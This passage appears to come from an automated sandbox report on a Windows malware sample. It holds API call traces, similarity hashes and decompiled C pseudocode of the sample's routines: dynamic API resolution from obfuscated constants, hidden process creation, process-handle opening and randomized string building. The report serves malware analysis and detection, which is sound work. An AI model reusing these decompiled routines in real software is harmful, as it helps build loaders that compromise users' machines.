  • Part of subcall function 00A922AB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00A9A714,?,04FD95B0), ref: 00A9231D
• StrTrimA.SHLWAPI(00000000,00A9C2AC,?,04FD95B0), ref: 00A9728C
  • Part of subcall function 00A92629: lstrlen.KERNEL32(04FD9B98,00000000,00000000,770CC740,00A9A73F,00000000), ref: 00A92639
  • Part of subcall function 00A92629: lstrlen.KERNEL32(?), ref: 00A92641
  • Part of subcall function 00A92629: lstrcpy.KERNEL32(00000000,04FD9B98), ref: 00A92655
  • Part of subcall function 00A92629: lstrcat.KERNEL32(00000000,?), ref: 00A92660
• lstrcpy.KERNEL32(00000000,?), ref: 00A972AD
• lstrcpy.KERNEL32(?,?), ref: 00A972B5
• lstrcat.KERNEL32(?,?), ref: 00A972C3
• lstrcat.KERNEL32(?,00000000), ref: 00A972C9
  • Part of subcall function 00A93037: lstrlen.KERNEL32(?,00000000,04FD9BB8,00000000,00A96F37,04FD9D96,?,?,?,?,?,69B25F44,00000005,00A9D00C), ref: 00A9303E
  • Part of subcall function 00A93037: mbstowcs.NTDLL ref: 00A93067
  • Part of subcall function 00A93037: memset.NTDLL ref: 00A93079
• wcstombs.NTDLL ref: 00A9735A
  • Part of subcall function 00A92EA6: SysAllocString.OLEAUT32(?), ref: 00A92EE1
  • Part of subcall function 00A953BB: RtlFreeHeap.NTDLL(00000000,00000000,00A912FA,00000000,?,?,00000000), ref: 00A953C7
• HeapFree.KERNEL32(00000000,?,?), ref: 00A9739B
• HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00A973A7
• HeapFree.KERNEL32(00000000,?,?,04FD95B0), ref: 00A973B3
• HeapFree.KERNEL32(00000000,?), ref: 00A973BF
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?), ref: 00A973CB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 3748877296-1536154274
                                                                                                                                                                                                                                • Opcode ID: bf0bc005ddbe151ba9beb5e9803e8639364fc55ebf957875e2f6ac8801b9f428
                                                                                                                                                                                                                                • Instruction ID: 7a8ce61136f1429ed12e8be6f8b13a22c387f072ba5391b7889174a861984695
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf0bc005ddbe151ba9beb5e9803e8639364fc55ebf957875e2f6ac8801b9f428
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE913771A00209EFCF11DFA4DE89AAE7BB9FF48350F144056F9059B261DB31E952DB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                                                			E00A974A5(void* __eax, void* __ecx) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                                                				long _v32;
                                                                                                                                                                                                                                				void _v104;
                                                                                                                                                                                                                                				char _v108;
                                                                                                                                                                                                                                				long _t36;
                                                                                                                                                                                                                                				intOrPtr _t40;
                                                                                                                                                                                                                                				intOrPtr _t47;
                                                                                                                                                                                                                                				intOrPtr _t50;
                                                                                                                                                                                                                                				void* _t58;
                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                				intOrPtr* _t70;
                                                                                                                                                                                                                                				intOrPtr* _t71;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t1 = __eax + 0x14; // 0x74183966
                                                                                                                                                                                                                                				_t69 =  *_t1;
                                                                                                                                                                                                                                				_t36 = E00A96856(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                                                                                                                                                                                                				_v8 = _t36;
                                                                                                                                                                                                                                				if(_t36 != 0) {
                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                					return _v8;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				E00A9A929( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                                                                                                                                                                                                				_t40 = _v12(_v12);
                                                                                                                                                                                                                                				_v8 = _t40;
                                                                                                                                                                                                                                				if(_t40 == 0 && ( *0xa9d298 & 0x00000001) != 0) {
                                                                                                                                                                                                                                					_v32 = 0;
                                                                                                                                                                                                                                					asm("stosd");
                                                                                                                                                                                                                                					asm("stosd");
                                                                                                                                                                                                                                					asm("stosd");
                                                                                                                                                                                                                                					_v108 = 0;
                                                                                                                                                                                                                                					memset( &_v104, 0, 0x40);
                                                                                                                                                                                                                                					_t47 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                					_t18 = _t47 + 0xa9e3b3; // 0x73797325
                                                                                                                                                                                                                                					_t68 = E00A91EBA(_t18);
                                                                                                                                                                                                                                					if(_t68 == 0) {
                                                                                                                                                                                                                                						_v8 = 8;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t50 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                						_t19 = _t50 + 0xa9e760; // 0x4fd8d08
                                                                                                                                                                                                                                						_t20 = _t50 + 0xa9e0af; // 0x4e52454b
                                                                                                                                                                                                                                						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                                                                                                                                                                                                						if(_t71 == 0) {
                                                                                                                                                                                                                                							_v8 = 0x7f;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_v108 = 0x44;
                                                                                                                                                                                                                                							E00A97020();
                                                                                                                                                                                                                                							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                                                                                                                                                                                                							_push(1);
                                                                                                                                                                                                                                							E00A97020();
                                                                                                                                                                                                                                							if(_t58 == 0) {
                                                                                                                                                                                                                                								_v8 = GetLastError();
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								CloseHandle(_v28);
                                                                                                                                                                                                                                								CloseHandle(_v32);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						HeapFree( *0xa9d270, 0, _t68);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t70 = _v16;
                                                                                                                                                                                                                                				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                                                                                                                                                                                                				E00A953BB(_t70);
                                                                                                                                                                                                                                				goto L12;
                                                                                                                                                                                                                                			}


















                                                                                                                                                                                                                                0x00a97586
                                                                                                                                                                                                                                0x00a975b4
                                                                                                                                                                                                                                0x00a975b4
                                                                                                                                                                                                                                0x00a9752c
                                                                                                                                                                                                                                0x00a975c3
                                                                                                                                                                                                                                0x00a975cc
                                                                                                                                                                                                                                0x00a975d0
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A96856: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,00A974C1,?,00000001,?,?,00000000,00000000), ref: 00A9687B
                                                                                                                                                                                                                                  • Part of subcall function 00A96856: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00A9689D
                                                                                                                                                                                                                                  • Part of subcall function 00A96856: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00A968B3
                                                                                                                                                                                                                                  • Part of subcall function 00A96856: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00A968C9
                                                                                                                                                                                                                                  • Part of subcall function 00A96856: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00A968DF
                                                                                                                                                                                                                                  • Part of subcall function 00A96856: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00A968F5
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A9750F
                                                                                                                                                                                                                                  • Part of subcall function 00A91EBA: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00A97528,73797325), ref: 00A91ECB
                                                                                                                                                                                                                                  • Part of subcall function 00A91EBA: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00A91EE5
                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(4E52454B,04FD8D08,73797325), ref: 00A97545
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00A9754C
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000), ref: 00A975B4
                                                                                                                                                                                                                                  • Part of subcall function 00A97020: GetProcAddress.KERNEL32(36776F57,00A96B1C), ref: 00A9703B
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,00000001), ref: 00A97591
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00A97596
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000001), ref: 00A9759A
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                                                                                                                                                                                                • String ID: Uxt$@MxtNxt
                                                                                                                                                                                                                                • API String ID: 3075724336-2342693527
                                                                                                                                                                                                                                • Opcode ID: ec861adf7d61599727047ac3c500e8140ec9491f614f770797ac6d76b59805ba
                                                                                                                                                                                                                                • Instruction ID: 4b6e45acbc1069486e0b72bd7b6c4e16bfce0cbd82b88943c1dee94a8b8df24c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec861adf7d61599727047ac3c500e8140ec9491f614f770797ac6d76b59805ba
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F3143B6A04208EFDF10EFE4DD89EAEBBFCEB04354F154466E505A7111D6309D45CBA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 27%
                                                                                                                                                                                                                                			E00A95E8A(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                                                				long _v16;
                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                				signed int _v24;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				long _t43;
                                                                                                                                                                                                                                				intOrPtr _t44;
                                                                                                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                                                                                                				void* _t48;
                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                				void* _t50;
                                                                                                                                                                                                                                				intOrPtr _t54;
                                                                                                                                                                                                                                				intOrPtr _t57;
                                                                                                                                                                                                                                				void* _t58;
                                                                                                                                                                                                                                				void* _t59;
                                                                                                                                                                                                                                				void* _t60;
                                                                                                                                                                                                                                				intOrPtr _t66;
                                                                                                                                                                                                                                				void* _t71;
                                                                                                                                                                                                                                				void* _t74;
                                                                                                                                                                                                                                				intOrPtr _t75;
                                                                                                                                                                                                                                				void* _t77;
                                                                                                                                                                                                                                				intOrPtr _t79;
                                                                                                                                                                                                                                				intOrPtr* _t80;
                                                                                                                                                                                                                                				intOrPtr _t91;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t79 =  *0xa9d37c; // 0x4fd9818
                                                                                                                                                                                                                                				_v24 = 8;
                                                                                                                                                                                                                                				_t43 = GetTickCount();
                                                                                                                                                                                                                                				_push(5);
                                                                                                                                                                                                                                				_t74 = 0xa;
                                                                                                                                                                                                                                				_v16 = _t43;
                                                                                                                                                                                                                                				_t44 = E00A99CCC(_t74,  &_v16);
                                                                                                                                                                                                                                				_v8 = _t44;
                                                                                                                                                                                                                                				if(_t44 == 0) {
                                                                                                                                                                                                                                					_v8 = 0xa9c1ac;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t46 = E00A91F9B(_t79);
                                                                                                                                                                                                                                				_v12 = _t46;
                                                                                                                                                                                                                                				if(_t46 != 0) {
                                                                                                                                                                                                                                					_t80 = __imp__;
                                                                                                                                                                                                                                					_t48 =  *_t80(_v8, _t71);
                                                                                                                                                                                                                                					_t49 =  *_t80(_v12);
                                                                                                                                                                                                                                					_t50 =  *_t80(_a4);
                                                                                                                                                                                                                                					_t54 = E00A95157(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                                                                                                                                                                                                					_v20 = _t54;
                                                                                                                                                                                                                                					if(_t54 != 0) {
                                                                                                                                                                                                                                						_t75 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                						_t16 = _t75 + 0xa9eb10; // 0x530025
                                                                                                                                                                                                                                						 *0xa9d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                                                                                                                                                                                                						_push(4);
                                                                                                                                                                                                                                						_t77 = 5;
                                                                                                                                                                                                                                						_t57 = E00A99CCC(_t77,  &_v16);
                                                                                                                                                                                                                                						_v8 = _t57;
                                                                                                                                                                                                                                						if(_t57 == 0) {
                                                                                                                                                                                                                                							_v8 = 0xa9c1b0;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t58 =  *_t80(_v8);
                                                                                                                                                                                                                                						_t59 =  *_t80(_v12);
                                                                                                                                                                                                                                						_t60 =  *_t80(_a4);
                                                                                                                                                                                                                                						_t91 = E00A95157(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                                                                                                                                                                                                						if(_t91 == 0) {
                                                                                                                                                                                                                                							E00A953BB(_v20);
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_t66 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                							_t31 = _t66 + 0xa9ec30; // 0x73006d
                                                                                                                                                                                                                                							 *0xa9d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                                                                                                                                                                                                							 *_a16 = _v20;
                                                                                                                                                                                                                                							_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                							 *_a20 = _t91;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					E00A953BB(_v12);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _v24;
                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00A95E9F
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,80000002,00000005), ref: 00A95EDF
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 00A95EE8
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000), ref: 00A95EEF
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(80000002), ref: 00A95EFC
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,00000004), ref: 00A95F5C
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 00A95F65
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?), ref: 00A95F6C
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00A95F73
                                                                                                                                                                                                                                  • Part of subcall function 00A953BB: RtlFreeHeap.NTDLL(00000000,00000000,00A912FA,00000000,?,?,00000000), ref: 00A953C7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$CountFreeHeapTick
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2535036572-0
                                                                                                                                                                                                                                • Opcode ID: ddcd8de781299650ccbf20f007164713320139c8ead2621d22999f3514688682
                                                                                                                                                                                                                                • Instruction ID: 461894e36535d8db583475aea57643c2b17162a019dbc877ce8a1a85e4a1b5e2
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ddcd8de781299650ccbf20f007164713320139c8ead2621d22999f3514688682
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53417976E00609FBCF12AFA4CD0AE9E7BB5EF44354F154465F904A7221DB319A11EFA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 63%
                                                                                                                                                                                                                                			E00A922AB(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                                                                                                				intOrPtr _t9;
                                                                                                                                                                                                                                				intOrPtr _t13;
                                                                                                                                                                                                                                				char* _t28;
                                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                				char* _t36;
                                                                                                                                                                                                                                				intOrPtr* _t40;
                                                                                                                                                                                                                                				char* _t41;
                                                                                                                                                                                                                                				char* _t42;
                                                                                                                                                                                                                                				char* _t43;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t34 = __edx;
                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                				_t9 =  *0xa9d2e0; // 0x453a5a8
                                                                                                                                                                                                                                				_t1 = _t9 + 0xa9e62c; // 0x253d7325
                                                                                                                                                                                                                                				_t36 = 0;
                                                                                                                                                                                                                                				_t28 = E00A91BB5(__ecx, _t1);
                                                                                                                                                                                                                                				if(_t28 != 0) {
                                                                                                                                                                                                                                					_t40 = __imp__;
                                                                                                                                                                                                                                					_t13 =  *_t40(_t28);
                                                                                                                                                                                                                                					_v8 = _t13;
                                                                                                                                                                                                                                					_t41 = E00A95157(_v8 +  *_t40(_a4) + 1);
                                                                                                                                                                                                                                					if(_t41 != 0) {
                                                                                                                                                                                                                                						strcpy(_t41, _t28);
                                                                                                                                                                                                                                						_pop(_t33);
                                                                                                                                                                                                                                						__imp__(_t41, _a4);
                                                                                                                                                                                                                                						_t36 = E00A973E0(_t34, _t41, _a8);
                                                                                                                                                                                                                                						E00A953BB(_t41);
                                                                                                                                                                                                                                						_t42 = E00A915FD(StrTrimA(_t36, "="), _t36);
                                                                                                                                                                                                                                						if(_t42 != 0) {
                                                                                                                                                                                                                                							E00A953BB(_t36);
                                                                                                                                                                                                                                							_t36 = _t42;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t43 = E00A9698B(_t36, _t33);
                                                                                                                                                                                                                                						if(_t43 != 0) {
                                                                                                                                                                                                                                							E00A953BB(_t36);
                                                                                                                                                                                                                                							_t36 = _t43;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					E00A953BB(_t28);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				return _t36;
                                                                                                                                                                                                                                			}

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A91BB5: lstrlen.KERNEL32(00000000,00000000,00000000,770CC740,?,?,?,00A922C5,253D7325,00000000,00000000,770CC740,?,?,00A9A714,?), ref: 00A91C1C
                                                                                                                                                                                                                                  • Part of subcall function 00A91BB5: sprintf.NTDLL ref: 00A91C3D
                                                                                                                                                                                                                                • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,770CC740,?,?,00A9A714,?,04FD95B0), ref: 00A922D6
                                                                                                                                                                                                                                • lstrlen.KERNEL32(?,?,?,00A9A714,?,04FD95B0), ref: 00A922DE
                                                                                                                                                                                                                                  • Part of subcall function 00A95157: RtlAllocateHeap.NTDLL(00000000,00000000,00A91259), ref: 00A95163
                                                                                                                                                                                                                                • strcpy.NTDLL ref: 00A922F5
                                                                                                                                                                                                                                • lstrcat.KERNEL32(00000000,?), ref: 00A92300
                                                                                                                                                                                                                                  • Part of subcall function 00A973E0: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,00A9230F,00000000,?,?,?,00A9A714,?,04FD95B0), ref: 00A973F7
                                                                                                                                                                                                                                  • Part of subcall function 00A953BB: RtlFreeHeap.NTDLL(00000000,00000000,00A912FA,00000000,?,?,00000000), ref: 00A953C7
                                                                                                                                                                                                                                • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,00A9A714,?,04FD95B0), ref: 00A9231D
                                                                                                                                                                                                                                  • Part of subcall function 00A915FD: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,00A92329,00000000,?,?,00A9A714,?,04FD95B0), ref: 00A91607
                                                                                                                                                                                                                                  • Part of subcall function 00A915FD: _snprintf.NTDLL ref: 00A91665
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                                                                                                                                • String ID: =
                                                                                                                                                                                                                                • API String ID: 2864389247-1428090586
                                                                                                                                                                                                                                • Opcode ID: f4133d8f6439e9fb81c57ad8f31d9710b391974af3a2e0c91056896645665f38
                                                                                                                                                                                                                                • Instruction ID: cb9a3861128ccdbf6c95b482b0988df1d283de6879e53bcd37253c7b50696902
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4133d8f6439e9fb81c57ad8f31d9710b391974af3a2e0c91056896645665f38
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF11A333B01925778E12B7B48D96CBF3AED9E457A03050126F5059B202DE78CD0257E1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A96246(intOrPtr _a4) {
                                                                                                                                                                                                                                				void* _t2;
                                                                                                                                                                                                                                				unsigned int _t4;
                                                                                                                                                                                                                                				void* _t5;
                                                                                                                                                                                                                                				long _t6;
                                                                                                                                                                                                                                				void* _t7;
                                                                                                                                                                                                                                				void* _t15;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t2 = CreateEventA(0, 1, 0, 0);
                                                                                                                                                                                                                                				 *0xa9d2a4 = _t2;
                                                                                                                                                                                                                                				if(_t2 == 0) {
                                                                                                                                                                                                                                					return GetLastError();
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t4 = GetVersion();
                                                                                                                                                                                                                                				if(_t4 != 5) {
                                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                                					if(_t15 <= 0) {
                                                                                                                                                                                                                                						_t5 = 0x32;
                                                                                                                                                                                                                                						return _t5;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                					 *0xa9d294 = _t4;
                                                                                                                                                                                                                                					_t6 = GetCurrentProcessId();
                                                                                                                                                                                                                                					 *0xa9d290 = _t6;
                                                                                                                                                                                                                                					 *0xa9d29c = _a4;
                                                                                                                                                                                                                                					_t7 = OpenProcess(0x10047a, 0, _t6);
                                                                                                                                                                                                                                					 *0xa9d28c = _t7;
                                                                                                                                                                                                                                					if(_t7 == 0) {
                                                                                                                                                                                                                                						 *0xa9d28c =  *0xa9d28c | 0xffffffff;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					return 0;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_t4 >> 8 > 0) {
                                                                                                                                                                                                                                					goto L5;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t15 = _t4 - _t4;
                                                                                                                                                                                                                                				goto L4;
                                                                                                                                                                                                                                			}


                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00A94D41,?,?,00000001,?,?,?,00A95992,?), ref: 00A9624E
                                                                                                                                                                                                                                • GetVersion.KERNEL32(?,00000001,?,?,?,00A95992,?), ref: 00A9625D
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,00A95992,?), ref: 00A96279
                                                                                                                                                                                                                                • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,00A95992,?), ref: 00A96296
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000001,?,?,?,00A95992,?), ref: 00A962B5
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 2270775618-1701360479
                                                                                                                                                                                                                                • Opcode ID: ab9a15b7667cac9b87385100f101ce49c72b775d11c28505a9d598f533231203
                                                                                                                                                                                                                                • Instruction ID: f19bdbd271bfc111694c0dfe6cbd7d08bd8fa89076d82645a83f057376a37259
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab9a15b7667cac9b87385100f101ce49c72b775d11c28505a9d598f533231203
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15F0AF70B40701DBDF20CBB4AD1AB953BA4EB02761F10051BE506CA2E0DF70C482DF15
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00A91143
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(0070006F), ref: 00A91157
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00A91169
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A911D1
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A911E0
                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00A911EB
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000003.00000002.880047850.0000000000A91000.00000020.00020000.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880026215.0000000000A90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880089761.0000000000A9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880147576.0000000000A9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000003.00000002.880155943.0000000000A9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: String$AllocFree
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 344208780-0
                                                                                                                                                                                                                                • Opcode ID: 6f14e7bf0ff1fc24e8526ffc98057678d78a3e92e03d8d161298df9e20ad8020
